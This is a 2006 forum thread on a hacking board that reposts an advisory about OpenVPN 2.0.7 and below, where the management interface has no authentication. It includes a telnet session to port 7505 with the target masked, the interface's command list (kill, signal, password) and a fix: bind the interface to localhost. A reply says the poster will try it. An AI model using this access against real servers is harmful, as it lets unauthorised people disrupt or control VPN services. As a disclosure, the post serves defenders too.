OpenVPN 2.0.7 and below: Remote OpenVPN Management Interface Flaw

Discussion in 'Forum for discussion of ANTICHAT' started by NeMiNeM, 4 May 2006.

  1. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    307
    Reputations:
    201
    Code:
    There is a flaw (well more a stupid design than anything else) in OpenVPN
    2.0.7 (and below) in the the Remote Management Interface that allows an
    attacker to gain complete control because there is NO AUTHENTICATION (YES NO
    AUTHENTICATION AT ALL!). This can be carried out from within the LAN that
    the OpenVPN server is running on, over the VPN itself or via the internet. 
    This happens
    because the management interface can be binded to an internet accessible IP
    address. Not good!
    
    Simply telnet to the OpenVPN server running the remote management interface
    on port 7505.
    
    root@trinity# telnet ********* 7505
    Trying *********...
    Connected to *********.
    Escape character is '^]'.
    >INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
    help
    Management Interface for OpenVPN 2.0_rc14 i686-suse-linux [SSL] [LZO]
    [EPOLL] built on Feb 3 2005
    Commands:
    echo [on|off] [N|all] : Like log, but only show messages in echo buffer.
    exit|quit : Close management session.
    help : Print this message.
    hold [on|off|release] : Set/show hold flag to on/off state, or
    release current hold and start tunnel.
    kill cn : Kill the client instance(s) having common name cn.
    kill IP:port : Kill the client instance connecting from IP:port.
    log [on|off] [N|all] : Turn on/off realtime log display
    + show last N lines or 'all' for entire history.
    mute [n] : Set log mute level to n, or show level if n is
    absent.
    net : (Windows only) Show network info and routing table.
    password type p : Enter password p for a queried OpenVPN password.
    signal s : Send signal s to daemon,
    s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
    state [on|off] [N|all] : Like log, but show state history.
    status [n] : Show current daemon status info using format #n.
    test n : Produce n lines of output for testing/debugging.
    username type u : Enter username u for a queried OpenVPN username.
    verb [n] : Set log verbosity level to n, or show if n is
    absent.
    version : Show current version number.
    END
    exit
    Connection closed by foreign host.
    root@trinity#
    
    The fix? Make sure you bind the remote management interface to 127.0.0.1 or
    a local network address (however, the later will not stop you getting pwned
    internally, obviously).
    
    A quote from the OpenVPN guys themselves:
    
    "The management protocol is currently cleartext without an explicit security
    layer. For this reason, it is recommended that the management interface
    either listen on localhost (127.0.0.1) or on the local VPN address. It's
    possible to remotely connect to the management interface over the VPN
    itself, though some capabilities will be limited in this mode, such as the
    ability to provide private key passwords."
    
    "Future versions of the management interface may allow out-of-band
    connections (i.e. not over the VPN) and secured with SSL/TLS."
    
    OMG *&$%*%# software vendors, please don't release stuff without
    authentication!
    
    c0redump
    #hacktech @ undernet
    securityfocus.com
     
    2 people like this.
  2. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    [rus]Интересно. Как-нибудь надо попробовать...[/rus]

    [eng]Pretty interesting. Will have to try it...[/eng]
     
    #2 virgoz, 4 May 2006
    Last edited by a moderator: 4 May 2006
Loading...